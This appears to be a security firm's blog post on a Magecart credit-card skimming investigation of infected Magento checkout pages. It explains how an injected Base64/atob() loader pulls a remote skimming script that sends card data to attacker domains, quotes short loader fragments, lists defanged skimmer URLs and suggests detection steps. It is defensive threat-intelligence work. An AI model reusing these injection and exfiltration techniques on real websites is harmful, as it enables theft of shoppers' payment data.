Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.
This was the HTTP capture:
At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path of Magecart attacks). Secondly, the GET request is to a third party domain (mxcounter.com). And thirdly it requests a “.GIF” file followed by a long Base64 encoded string.
So I immediately decoded the Base64 string which resulted in the following :
Some obvious data exfiltration is going on there!
Next, I investigated and checked the HTML source code in the checkout page and found this JavaScript at the bottom of the webpage which was not obvious at first:
De-obfuscating the code results in something like this:
Basically what this script does is:
In short, it injects an external malicious script into the checkout page.
Checking out the JavaScript code from 'https://mxcounter.com/click.js?v=1.7' uncovers a skimming script, as seen in the image below. This script captures personal details and credit card data entered by the merchant’s customer in the checkout page. This details are stored in a JavaScript dictionary with a variable name ‘data’, encoded in Base64 and sent as a URL parameter to https://mxcounter.com/c.gif?<Base64 encoded data> through a GET tunnel.
The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:
There are actually multiple versions of this skimming JavaScript from the same domain, which probably cater to different infected online merchants.
For example, here’s version 1.6 of the script:
and version 1.8:
and version 2.0, so on and so forth
So with all this in mind, I was curious to find other websites that had similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. I really wanted to search for websites for a string in the HTML code. I stumbled across this website called nerdydata.com which has a capability to do that:
The search result returned one website:
And sure enough, that website in the search result is infected:
So I tried a different search string and I searched for a string from the JavaScript code itself:
var img = document.createElement('script')
And there, it returned over 40 websites. I checked each of these websites and half of them were infected with Magecart malware scripts
I also checked most of the exfiltration/skimming URLs, but some of them are already down at the time of this writing. All of the injected source scripts in the infected webpages are encoded in Base64, which use the JavaScript method atob() to decode it. For example:
img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")
the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is Base64 encoding of http://mxcounter.com.
One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.
Take, for example, this infected retail webpage injected by a malicious JavaScript hosted at an external host:
That Base64 encoded string is actually the link to the malicious external script source:
Yet, when visiting that URL link directly, you will get a “503 Service Unavailable” HTTP error.
However, when you specify the correct HTTP header, User-Agent, Referer and Host, only then will return a malicious JavaScript. Here we used Postman to request the same website:
This code is still obfuscated, however, de-obfuscating the code reveals it is the typical checkout page skimming routine with exfiltration of data to the attacker’s host.
There are probably numerous other infected websites out there but here are the exfiltration/skimming JavaScript URLs I compiled during the investigation:
https://adsapigate[.]com/api.js?v=2.6
https://adsapigate[.]com/api.js?v=3.5
https://apitstatus[.]com/api.js?v=2.1.5
https://billgetstatus[.]com/api.js?v=1.6
https://clickdeskstats[.]com/cd.js
https://cloudodesc[.]com/gtm.js?v=1.3
https://cloudodesc[.]com/gtm.js?v=2.1
https://cloudodesc[.]com/gtm.js?v=2.94
https://gtmproc[.]com/gtm.js?v=1.5
https://livecheckpay[.]com/api.js?v=2.3
https://mxcounter[.]com/click.js?v=1.7
https://newrelicnet[.]com/api.js?v=1.2
https://newrelicnet[.]com/api.js?v=1.4
https://newrelicnet[.]com/api.js?v=4.5
https://nr-public[.]com/api.js?v=2.6
https://nr-public[.]com/api.js?v=2.8
https://ordercheckpays[.]com/api.js?v=2.29
https://ordercheckpays[.]com/api.js?v=3.3
https://reactjsapi[.]com/api.js?v=4.2.0
https://tagsmediaget[.]com/api.js?v=1.1.5
https://tagstracking[.]com/tag.js?v=2.1.2
https://tagstracking[.]com/tag.js?v=2.1.4
https://tagstracking[.]com/tag.js?v=2.1.8
https://tagstracking[.]com/tag.js?v=2.2.2
https://tagstracking[.]com/tag.js?v=2.2.4
https://tagstracking[.]com/tag.js?v=2.2.6
https://trust-tracker[.]com/tagtech.js
Most of the infected websites appear to be running old versions of Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are admin panel brute-force attack or spear-phishing attacks.
So, if you administer or own an e-commerce website running Magento platform, you may want to scan your checkout pages fora possible compromise. You can scan for Javascript code like CreateElement() method i.e. "var img = document.createElement('script')" then you can check if there are Base64 encoded strings that follow after that or the use of a JavaScript method atob(). You can decode the strings with Base64 tools such as tools like CyberChef (https://gchq.github.io/CyberChef/). This Base64 string is usually a URL. You should be able to decide if this URL is something you expect or suspect.